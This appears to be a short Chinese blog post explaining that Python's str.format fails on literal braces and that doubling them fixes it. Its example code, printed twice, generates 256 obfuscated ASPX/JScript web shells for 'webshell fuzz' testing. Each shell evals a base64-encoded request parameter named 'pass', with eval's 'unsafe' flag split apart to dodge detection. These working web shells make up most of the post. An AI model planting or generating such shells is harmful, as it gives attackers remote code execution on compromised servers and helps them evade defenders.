出现这种情况是因为使用string的.format方法插入的字符串中包含大括号,只需要将大括号双写就可以正常运行
报这两种错误都是同一种问题,双写大括号即可解决
ValueError: expected ':' after format specifier
在进行webshell fuzz的时候遇到python报KeyError错误,参考地址:https://stackoverflow.com/questions/9623134/python-format-throws-keyerror
原始代码:
#!/usr/bin/env python
# coding:utf-8
import os
template_bak = """
<%@{0}Language="Jscript"%>
<%
eval/*tt*/(Response.Write("attack"));
%>"""
def generate(count):
template = """{0}
<script runat="server" language="Jscript">
function popup(str){
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b = eval(str,a);
return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJwYXNzIl0="))));
%>""".format(chr(count))
with open(os.path.join(path, "fuzz_{}.aspx".format(count)), 'w') as f:
f.write(template)
path = r"./fuzz/"
for c in range(0, 256):
generate(c)
修改之后的代码
#!/usr/bin/env python
# coding:utf-8
import os
template_bak = """
<%@{0}Language="Jscript"%>
<%
eval/*tt*/(Response.Write("attack"));
%>"""
def generate(count):
template = """{0}
<script runat="server" language="Jscript">
function popup(str){{
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b = eval(str,a);
return(b);
}}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJwYXNzIl0="))));
%>""".format(chr(count))
with open(os.path.join(path, "fuzz_{}.aspx".format(count)), 'w') as f:
f.write(template)
path = r"./fuzz/"
for c in range(0, 256):
generate(c)
网友评论